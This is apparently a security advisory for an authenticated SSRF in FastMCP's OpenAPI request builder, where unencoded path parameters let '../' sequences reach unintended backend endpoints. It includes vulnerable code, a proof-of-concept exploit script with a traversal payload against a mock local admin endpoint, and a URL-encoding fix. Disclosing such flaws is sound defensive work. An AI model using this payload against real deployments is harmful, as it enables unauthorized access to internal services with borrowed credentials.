"details": "## Technical Description\n\nThe `OpenAPIProvider` in FastMCP exposes internal APIs to MCP clients by parsing OpenAPI specifications. The `RequestDirector` class is responsible for constructing HTTP requests to the backend service.\n\nA critical vulnerability exists in the `_build_url()` method. When an OpenAPI operation defines path parameters (e.g., `/api/v1/users/{user_id}`), the system directly substitutes parameter values into the URL template string **without URL-encoding**. Subsequently, `urllib.parse.urljoin()` resolves the final URL.\n\nSince `urljoin()` interprets `../` sequences as directory traversal, an attacker controlling a path parameter can perform path traversal attacks to escape the intended API prefix and access arbitrary backend endpoints. This results in **authenticated SSRF**, as requests are sent with the authorization headers configured in the MCP provider.\n\n---\n\n## Vulnerable Code\n\n**File:** `fastmcp/utilities/openapi/director.py`\n\n```python\ndef _build_url(\n self, path_template: str, path_params: dict[str, Any], base_url: str\n) -> str:\n # Direct string substitution without encoding\n url_path = path_template\n for param_name, param_value in path_params.items():\n placeholder = f\"{{{param_name}}}\"\n if placeholder in url_path:\n url_path = url_path.replace(placeholder, str(param_value))\n\n # urljoin resolves ../ escape sequences\n return urljoin(base_url.rstrip(\"/\") + \"/\", url_path.lstrip(\"/\"))\n```\n\n### Root Cause\n\n1. Path parameters are substituted directly without URL encoding\n2. `urllib.parse.urljoin()` interprets `../` as directory traversal\n3. No validation prevents traversal sequences in parameter values\n4. Requests inherit the authentication context of the MCP provider\n\n---\n\n## Proof of Concept\n\n### Step 1: Backend API Setup\n\nCreate `internal_api.py` to simulate a vulnerable backend server:\n\n```python\nfrom fastapi import FastAPI, Header, HTTPException\nimport uvicorn\n\napp = FastAPI()\n\n@app.get(\"/api/v1/users/{user_id}/profile\")\ndef get_profile(user_id: str):\n return {\"status\": \"success\", \"user\": user_id}\n\n@app.get(\"/admin/delete-all\")\ndef admin_endpoint(authorization: str = Header(None)):\n if authorization == \"Bearer admin_secret\":\n return {\"status\": \"CRITICAL\", \"message\": \"Administrative access granted\"}\n raise HTTPException(status_code=401)\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"127.0.0.1\", port=8080)\n```\n\n### Step 2: Exploitation Script\n\nCreate `exploit_poc.py`:\n\n```python\nimport asyncio\nimport httpx\nfrom fastmcp.utilities.openapi.director import RequestDirector\n\nasync def exploit_ssrf():\n # Initialize vulnerable component\n director = RequestDirector(spec={})\n base_url = \"http://127.0.0.1:8080/\"\n template = \"/api/v1/users/{id}/profile\"\n \n # Payload: Path traversal to reach /admin/delete-all\n # The '?' character neutralizes the rest of the original template\n payload = \"../../../admin/delete-all?\"\n \n # Construct malicious URL\n malicious_url = director._build_url(template, {\"id\": payload}, base_url)\n print(f\"[*] Generated URL: {malicious_url}\")\n\n async with httpx.AsyncClient() as client:\n # Request inherits MCP provider's authorization headers\n response = await client.get(\n malicious_url, \n headers={\"Authorization\": \"Bearer admin_secret\"}\n )\n print(f\"[+] Status Code: {response.status_code}\")\n print(f\"[+] Response: {response.text}\")\n\nif __name__ == \"__main__\":\n asyncio.run(exploit_ssrf())\n```\n\n### Expected Output\n\n```\n[*] Generated URL: http://127.0.0.1:8080/admin/delete-all?\n[+] Status Code: 200\n[+] Response: {\"status\": \"CRITICAL\", \"message\": \"Administrative access granted\"}\n```\n\nThe attacker successfully accessed an endpoint not defined in the OpenAPI specification using the MCP provider's authentication credentials.\n\n---\n\n## Impact Assessment\n\n### Severity Justification\n\n- **Unauthorized Access**: Attackers can interact with private endpoints not exposed in the OpenAPI specification\n- **Privilege Escalation**: The attacker operates within the MCP provider's security context and credentials\n- **Authentication Bypass**: The primary security control of OpenAPIProvider (restricting access to safe functions) is completely circumvented\n- **Data Exfiltration**: Sensitive internal APIs can be accessed and exploited\n- **Lateral Movement**: Internal-only services may be compromised from the network boundary\n\n### Attack Scenarios\n\n1. **Accessing Admin Panels**: Bypass API restrictions to reach administrative endpoints\n2. **Data Theft**: Access internal databases or sensitive information endpoints\n3. **Service Disruption**: Trigger destructive operations on backend services\n4. **Credential Extraction**: Access endpoints returning API keys, tokens, or credentials\n\n---\n\n## Remediation\n\n### Recommended Fix\n\nURL-encode all path parameter values **before** substitution to ensure reserved characters (`/`, `.`, `?`, `#`) are treated as literal data, not path delimiters.\n\n**Updated code for `_build_url()` method:**\n\n```python\nimport urllib.parse\n\ndef _build_url(\n self, path_template: str, path_params: dict[str, Any], base_url: str\n) -> str:\n url_path = path_template\n for param_name, param_value in path_params.items():\n placeholder = f\"{{{param_name}}}\"\n if placeholder in url_path:\n # Apply safe URL encoding to prevent traversal attacks\n # safe=\"\" ensures ALL special characters are encoded\n safe_value = urllib.parse.quote(str(param_value), safe=\"\")\n url_path = url_path.replace(placeholder, safe_value)\n\n return urljoin(base_url.rstrip(\"/\") + \"/\", url_path.lstrip(\"/\"))\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments